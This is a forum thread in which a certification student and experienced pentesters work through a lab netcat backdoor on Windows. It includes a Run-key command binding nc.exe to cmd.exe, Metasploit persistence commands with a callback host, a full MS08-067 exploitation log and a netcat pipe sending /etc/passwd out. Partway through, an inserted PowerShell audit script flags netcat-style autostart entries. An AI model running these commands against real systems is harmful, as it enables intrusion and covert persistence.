
netcat question

Dalobo

Newbie

Posts: 27

Joined: Wed Jan 23, 2013 7:49 pm

Post Sun Jan 27, 2013 8:45 pm

netcat question

I spent the last few hours in the lab figuring out how to upload, autorun, and clean up all evidence that I had ever had a backdoor on a Windows box.

But I ran across a few things I could not figure out.

Steps:
Got a meterpreter shell on the victim
Uploaded nc.exe to the system32 folder
Set the regkey for running nc in listening mode at startup
Logged in as the admin on the victim machine
Rebooted the victims server using meterpreter reboot cmd
Waited for windows to reboot
Logged in as admin on the victim server
Connected from BT using nc IP port command

Questions:

1. When in meterpreter, why can I only reboot the remote victims machine when someone is logged in on that machine?
2. Why can I only connect to netcat on the victims machine when someone is logged in on that machine?

What am I doing wrong? Doing it this way just makes me more likely to get caught.

Thank you,

Dalobo
Dark_Knight

Sr. Member

Posts: 294

Joined: Mon Aug 11, 2008 7:03 pm

Post Sun Jan 27, 2013 9:52 pm

Re: netcat question

Having established a meterpreter session, do you migrate to another process?
Last edited by Dark_Knight on Sun Jan 27, 2013 9:56 pm, edited 1 time in total.
CEH, OSCP, GPEN, GWAPT, GCIA
http://sector876.blogspot.com
Dalobo

Newbie

Posts: 27

Joined: Wed Jan 23, 2013 7:49 pm

Post Mon Jan 28, 2013 5:53 pm

Re: netcat question

No, I did not. I used MS08-067 to own the box. When I typed shell, and then whoami, I think I got administrator. That would make sense. I was not NT Authority.

I will have to try this again, but see about getting NT Authority. I will let you know once I have time to work on it again

Thank you Dark_Knight.

Dalobo
dynamik

Recruiters

Posts: 1119

Joined: Sun Nov 09, 2008 11:00 am

Location: Mile High City

Post Mon Jan 28, 2013 6:41 pm

Re: netcat question

You should be SYSTEM with MS08-067, not administrator.

It would help if you post the exact registry key you added and the shutdown/restart command you're trying to use.
The day you stop learning is the day you start becoming obsolete.
Dalobo

Newbie

Posts: 27

Joined: Wed Jan 23, 2013 7:49 pm

Post Mon Jan 28, 2013 7:58 pm

Re: netcat question

OK. I redid this and I am NT Authority, and the reboot command worked without having me log into the victim as admin.

I am still unable to connect using netcat.

I set the following key using this command

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\currentversion\\RUN -v BackDoor -d c:\\windows\\system32\\nc.exe" -L -d -p 1234 -e cmd.exe"

meterpreter > reboot

Once rebooted, I open a terminal and type:
nc 192.168.5.150 1234

I get connection refused.

I will do some more testing and get back to you.

Thank you,

Dalobo
superkojiman

Jr. Member

Posts: 81

Joined: Thu Sep 20, 2012 9:42 pm

Post Mon Jan 28, 2013 11:01 pm

Re: netcat question

Is the Windows firewall turned on? Can you check whether netcat is running and listening on the port you specified after you rebooted?
OSCP + OSCE
dynamik

Recruiters

Posts: 1119

Joined: Sun Nov 09, 2008 11:00 am

Location: Mile High City

Post Mon Jan 28, 2013 11:24 pm

Re: netcat question

I believe all the "run" registry keys require a user to log in. The "run" under HKLM applies to all users, and the "run" under HKU will only apply to that specific user.

If you haven't played around with it yet, do a run persistence -h inside of a meterpreter session. The -S option will allow you to install a service that should run upon startup.
The day you stop learning is the day you start becoming obsolete.
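A defender's audit of the three autostart scopes dynamik describes, as an added example that is not part of the thread: it lists HKLM Run entries (fire at any user's logon), per-user Run entries under HKU (fire only at that user's logon) and auto-start services (start at boot, which is where run persistence -S lands), and flags any command that references a netcat-family binary or binds a shell with -e. It assumes it is run from an elevated PowerShell on the Windows host being examined; the suspicious-command regex is my own choice, not something from the thread.

```powershell
# Added example, not from the thread: enumerate the three autostart scopes
# discussed above and flag netcat-style entries. Run elevated on the Windows host.

function Get-RunKeyEntries {
    param([string]$Path, [string]$Scope)
    $props = Get-ItemProperty -Path $Path -ErrorAction SilentlyContinue
    if ($null -eq $props) { return }
    foreach ($p in $props.PSObject.Properties) {
        # Get-ItemProperty adds PSPath/PSParentPath/... metadata; skip those.
        if ($p.Name -notmatch '^PS') {
            [pscustomobject]@{ Scope = $Scope; Name = $p.Name; Command = [string]$p.Value }
        }
    }
}

$runSubkey = 'Software\Microsoft\Windows\CurrentVersion\Run'

$findings = @(
    # Fires for whichever user logs on interactively; nothing runs before logon.
    Get-RunKeyEntries -Path "HKLM:\$runSubkey" -Scope 'HKLM Run (any logon)'

    # Per-user hives: fires only when that SID logs on.
    foreach ($hive in Get-ChildItem 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue) {
        $sid = $hive.PSChildName
        Get-RunKeyEntries -Path "Registry::HKEY_USERS\$sid\$runSubkey" -Scope "HKU Run ($sid)"
    }

    # Auto-start services run at boot with no logon at all (what persistence -S creates).
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.StartMode -eq 'Auto' } |
        ForEach-Object {
            [pscustomobject]@{ Scope = 'Service (boot)'; Name = $_.Name; Command = $_.PathName }
        }
)

# Pattern is an assumption for illustration: netcat-family binaries, or any
# command that hands a shell to a socket with -e.
$shellPattern = '(^|\\|\s)(nc|nc64|ncat|netcat|socat|cryptcat)(\.exe)?(\s|$)|-e\s+cmd(\.exe)?'
$suspicious = $findings | Where-Object { $_.Command -match $shellPattern }

$findings | Sort-Object Scope, Name | Format-Table -AutoSize
if ($suspicious) {
    Write-Warning 'Autostart entries that look like a netcat bind/reverse shell:'
    $suspicious | Format-Table -AutoSize
}
```

Entries under the two Run scopes explain the "only when someone is logged in" symptom; only the service scope survives a reboot with no interactive logon.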
Dalobo

Newbie

Posts: 27

Joined: Wed Jan 23, 2013 7:49 pm

Post Sat Feb 02, 2013 8:47 pm

Re: netcat question

I still can't get netcat to connect without a user being logged in.

I did give the persistence a try and can now have meterpreter call home whenever I lose the sessions. :)

I used
  Code:
run persistence -S -A -X -i 10 -p 445 -r 192.168.1.10


I am still lost on how an admin would use netcat to control a server. If he has to log into Windows to be able to make a connection to netcat... then he can control it that way... what is the point of netcat at that time?

Thank you,

Dalobo
dynamik

Recruiters

Posts: 1119

Joined: Sun Nov 09, 2008 11:00 am

Location: Mile High City

Post Sat Feb 02, 2013 9:12 pm

Re: netcat question

Maybe you can create a netcat service similar to what run persistence does using sc: http://technet.microsoft.com/en-us/libr ... 89(v=ws.10).aspx

There really isn't a practical reason for an admin to use netcat to legitimately administer a server. Remote desktop, psexec, PowerShell, etc. would be used in practice.
The day you stop learning is the day you start becoming obsolete.
Dalobo

Newbie

Posts: 27

Joined: Wed Jan 23, 2013 7:49 pm

Post Sun Feb 03, 2013 8:26 am

Re: netcat question

Thanks. I thought netcat was a way for admins to administer their boxes without using RDP. While I understand that is kind of silly for them to do, I just thought that was the "legitimate" purpose of netcat. To be honest, as a pentester, I think I would rather have a meterpreter connection than a netcat connection.

I did have issues where the persistence shell did not call home after a few exits. I will have to play around with it some more.

Will persistence still make a connection back to you when you reboot your attacking box? I would think so, but was unable to get it to work for me.

I am doing all of this testing/learning for my CEH.

Thanks again for all the help,

Dalobo
dynamik

Recruiters

Posts: 1119

Joined: Sun Nov 09, 2008 11:00 am

Location: Mile High City

Post Sun Feb 03, 2013 1:47 pm

Re: netcat question

I'm sure there's been an admin or two that have tried, but it's really not a good solution. Hopefully they'd at least use socat or cryptcat and have it connect back to their system, not just bind so anyone on the network could access it ;)

There are a lot of legitimate uses for netcat. It's great to do basic network tests (i.e. did the firewall change get implemented correctly?):

  Code:
# nc -vv google.com 80

Connection to google.com 80 port [tcp/http] succeeded!


I also use it for copying information over the network where I don't want to set up something like file sharing.

  Code:
destination: # nc -lp 9999 > goodies.txt
source: # cat /etc/passwd | nc 192.168.1.99 9999

Be sure to familiarize yourself with the netcat cheat sheet: http://www.sans.org/security-resources/ ... eet_v1.pdf The port relaying stuff is pretty cool too.

And yes, Meterpreter is preferred to netcat from a pen testing perspective, but it's not always feasible or possible. It's important to know how to get around with a basic shell on both *nix and Windows systems.

I'm not sure why you're not receiving a connection upon a reboot. It works for me:

  Code:
msf > use exploit/windows/smb/ms08_067_netapi
rhost => 192.168.1.50
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.99:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes) to 192.168.1.50
[*] Meterpreter session 1 opened (192.168.1.99:4444 -> 192.168.1.50:1031) at Sun Feb 03 10:49:22 -0700 2013

meterpreter > run persistence -A -S -X -i 5 -p 443 -r 192.168.1.99
[*] Creating a persistent agent: LHOST=192.168.1.99 LPORT=443 (interval=5 onboot=true)
[*] Persistent agent script is 609700 bytes long
[*] Uploaded the persistent agent to C:\WINDOWS\TEMP\efdfhUSKx.vbs
[*] Agent executed with PID 1200
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\YkPXtjqzB
[*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\YkPXtjqzB
[*] Creating service LendDpizgQ
[*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/persistence/XXXXXX-AEF856CC_20130203.5054/clean_up__20130203.5054.rc
meterpreter > [*] Meterpreter session 2 opened (192.168.1.99:443 -> 192.168.1.50:1034) at Sun Feb 03 10:51:03 -0700 2013

Background session 1? [y/N]
msf exploit(ms08_067_netapi) > sessions

Active sessions
===============

  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ XXXXXX-AEF856CC  192.168.1.99:4444 -> 192.168.1.50:1031
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ XXXXXX-AEF856CC  192.168.1.99:443 -> 192.168.1.50:1034

msf exploit(ms08_067_netapi) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > reboot
Rebooting...
meterpreter > exit

[*] Meterpreter session 2 closed.  Reason: User exit
msf exploit(ms08_067_netapi) > [*] Meterpreter session 3 opened (192.168.1.99:443 -> 192.168.1.50:1035) at Sun Feb 03 10:52:04 -0700 2013

msf exploit(ms08_067_netapi) > sessions -K
[*] Killing all sessions...
[*] Meterpreter session 1 closed.
[*] Meterpreter session 3 closed.

msf exploit(ms08_067_netapi) > jobs

Jobs
====

  Id  Name
  --  ----
  0   Exploit: multi/handler

msf exploit(ms08_067_netapi) > [*] Meterpreter session 4 opened (192.168.1.99:443 -> 192.168.1.50:1025) at Sun Feb 03 10:52:44 -0700 2013


Make sure you have your listener (multi/handler) setup and waiting for the connection. run persistence will do this for you with -A, but you'll have to configure it manually if you don't use that. Check the output of netstat -anp tcp on your Windows host to start troubleshooting.

Way to actually get your hands dirty and not just memorize trivia for your CEH :)
The day you stop learning is the day you start becoming obsolete.
hayabusa

Hero Member

Posts: 1662

Joined: Mon Jan 29, 2007 2:59 pm

Post Mon Feb 04, 2013 8:11 am

Re: netcat question

ajohnson wrote:
> Way to actually get your hands dirty and not just memorize trivia for your CEH :)

^^ +1
~ hayabusa ~ 

"All men can see these tactics whereby I conquer, but what none can see is the strategy out of which victory is evolved." - Sun Tzu, 'The Art of War'


OSCE, OSCP , GPEN, C|EH
